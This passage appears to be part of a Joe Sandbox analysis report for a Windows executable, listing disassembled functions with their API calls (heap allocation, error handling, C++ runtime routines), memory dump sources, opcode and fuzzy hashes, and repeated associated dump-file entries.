                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877489077.00000000011F4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877597301.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Concurrency::cancel_current_task
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 118556049-0
                                                                                                                                              • Opcode ID: 48e7cfd51d487dde3dff31291a41ee8c902363bdd0f4e61194a6bec3fb0a5773
                                                                                                                                              • Instruction ID: cab4463cf3c8fe2375b08d02fc02be77fcc1170469f8a0776f0376f2faf3301c
                                                                                                                                              • Opcode Fuzzy Hash: 48e7cfd51d487dde3dff31291a41ee8c902363bdd0f4e61194a6bec3fb0a5773
                                                                                                                                              • Instruction Fuzzy Hash: 29313872B00404AFC714FE7CCD8987E7BAADB843587254269FC29CB345EA70EE0597A5
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00C97B58 Relevance: 1.5, APIs: 1, Instructions: 49memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00CA5924: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00CA5956
                                                                                                                                              • RtlReAllocateHeap.NTDLL(00000000,?,00C8BF90,00000000,0000000F,?,00C8BF90,?,?,?,?), ref: 00CA62E5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1876784166.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876906597.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876933783.0000000000DE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877066478.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877489077.00000000011F4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877597301.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                              • Opcode ID: 70d2a336e02c1d075aac4927b2c0e56779d69398a18686a588b4838fc8699d16
                                                                                                                                              • Instruction ID: a2e96b2f6ffbd16af417d6d222f0ec05ea9d9f894b1928857ae18da1c8f9fe3e
                                                                                                                                              • Opcode Fuzzy Hash: 70d2a336e02c1d075aac4927b2c0e56779d69398a18686a588b4838fc8699d16
                                                                                                                                              • Instruction Fuzzy Hash: 77F0A432601617AA9B213A66AC05F7B3758DBC37BCF2D0226F825EA1D1DE20DD00A5A1
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00C636F0 Relevance: 1.5, APIs: 1, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • Concurrency::cancel_current_task.LIBCPMT ref: 00C6373F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1876784166.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876906597.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876933783.0000000000DE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877066478.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877489077.00000000011F4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877597301.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Concurrency::cancel_current_task
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 118556049-0
                                                                                                                                              • Opcode ID: bf8bdb994f8b78c6ea1e93e862c5098b48677a1b32678d5e49d9988079045177
                                                                                                                                              • Instruction ID: ee770342e280487d405b46dfa04baeb0cfcef9cfae487351f4833742309dec38
                                                                                                                                              • Opcode Fuzzy Hash: bf8bdb994f8b78c6ea1e93e862c5098b48677a1b32678d5e49d9988079045177
                                                                                                                                              • Instruction Fuzzy Hash: 22F024F21400408BDB24AFA0D4864E9B3E8DF243A1310047AE99EC7142E726DF84A780
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00CA4EEA Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • RtlAllocateHeap.NTDLL(00000008,00C8C58A,?), ref: 00CA4F2B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1876784166.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876906597.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876933783.0000000000DE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877066478.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877489077.00000000011F4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877597301.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                              • Opcode ID: 564efa130697711f7db5934bb9f2006030801627399033d94a7dce9748fc6f4d
                                                                                                                                              • Instruction ID: c2f38550981f3842e4683312b5942836465dd37e1669540f81b2d0f74b26a5b1
                                                                                                                                              • Opcode Fuzzy Hash: 564efa130697711f7db5934bb9f2006030801627399033d94a7dce9748fc6f4d
                                                                                                                                              • Instruction Fuzzy Hash: D8F059316152236F9F282EA2AC01A6A378D9FC33A8F149012BC25E7180CAB0ED0096E0
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00CA5924 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00CA5956
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1876784166.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876906597.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876933783.0000000000DE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877066478.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877489077.00000000011F4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877597301.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                              • Opcode ID: 7719b6b59376690bebf3a07172ffb3d85cf8099558e8b8b72eee4f9bc01de0dc
                                                                                                                                              • Instruction ID: 33a42f0df118753ca50db3fb627ca8eeb2fa9db8305ea450b4a4ea4e4886d02e
                                                                                                                                              • Opcode Fuzzy Hash: 7719b6b59376690bebf3a07172ffb3d85cf8099558e8b8b72eee4f9bc01de0dc
                                                                                                                                              • Instruction Fuzzy Hash: DBE0E531202B23DBDE212B755C04BAB76489B433B8F188111BC2AEE5D0DB20CD0292A0
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00C9CDAC Relevance: 1.3, APIs: 1, Instructions: 52COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetLastError.KERNEL32(00000000,?,00C9CEE6,00000000,00000000,00000000,00000002,00000000,?,00CA40BE,00000000,00000000,00000000,00000002,00000000,00000000), ref: 00C9CDF5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1876784166.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876906597.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876933783.0000000000DE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877066478.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877489077.00000000011F4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877597301.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1452528299-0
                                                                                                                                              • Opcode ID: 40287283f9ee14000dd37b3b9e1a9d865295c6c4884dcbc540da9961a3db97fc
                                                                                                                                              • Instruction ID: d8f324ebce16f2708079f2084c2042550be69c808e44cb36b9173d0c4c6d654d
                                                                                                                                              • Opcode Fuzzy Hash: 40287283f9ee14000dd37b3b9e1a9d865295c6c4884dcbc540da9961a3db97fc
                                                                                                                                              • Instruction Fuzzy Hash: 3701DB3361465AAFCF05DF55DC49D9E3F29EB85320B240244F8159B2D0E671DE41DBA0
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Non-executed Functions

                                                                                                                                              Function 00C80DB0 Relevance: 29.1, APIs: 12, Strings: 4, Instructions: 1114COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ___std_exception_destroy.LIBVCRUNTIME ref: 00C81441
                                                                                                                                              • ___std_exception_destroy.LIBVCRUNTIME ref: 00C8145A
                                                                                                                                              • ___std_exception_destroy.LIBVCRUNTIME ref: 00C815C9
                                                                                                                                              • ___std_exception_destroy.LIBVCRUNTIME ref: 00C815E2
                                                                                                                                              • ___std_exception_destroy.LIBVCRUNTIME ref: 00C81771
                                                                                                                                              • ___std_exception_destroy.LIBVCRUNTIME ref: 00C8178A
                                                                                                                                              • ___std_exception_destroy.LIBVCRUNTIME ref: 00C818F8
                                                                                                                                              • ___std_exception_destroy.LIBVCRUNTIME ref: 00C81911
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1876784166.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876906597.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876933783.0000000000DE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877066478.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877489077.00000000011F4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877597301.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ___std_exception_destroy
                                                                                                                                              • String ID: array$number overflow parsing '$object$value
                                                                                                                                              • API String ID: 4194217158-3322379575
                                                                                                                                              • Opcode ID: c29d32f3604d8aae298b911afad06073bdf43f30adfcad8367c5334fb20c0450
                                                                                                                                              • Instruction ID: 8a085db11c3fd057d2058d56ffdbf463d6c4ea453b67f8ee111be153641f8a6c
                                                                                                                                              • Opcode Fuzzy Hash: c29d32f3604d8aae298b911afad06073bdf43f30adfcad8367c5334fb20c0450
                                                                                                                                              • Instruction Fuzzy Hash: 0DA2D970D0025DDFDB14EFA4C884BEEBBB9BF45304F148299E805AB342D770AA85DB65
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00CAF050 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1473COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1876784166.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876906597.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876933783.0000000000DE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877066478.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F60000.00000040.00000001.01000000.00000003.sdmpDownload File
